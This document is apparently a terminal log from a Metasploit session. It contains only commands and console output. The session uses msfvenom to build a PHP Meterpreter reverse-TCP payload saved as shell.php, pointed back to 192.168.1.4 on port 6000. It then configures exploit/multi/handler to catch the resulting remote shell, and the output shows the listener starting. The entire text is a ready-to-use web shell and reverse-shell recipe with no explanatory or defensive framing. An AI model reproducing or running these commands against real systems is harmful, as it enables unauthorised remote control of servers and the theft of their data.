msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.4 LPORT=6000 -f raw > shell.php
msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.1.4
msf exploit(handler) > set LPORT 6000
msf exploit(handler) > set payload php/meterpreter_reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.4:6000
[*] Starting the payload handler...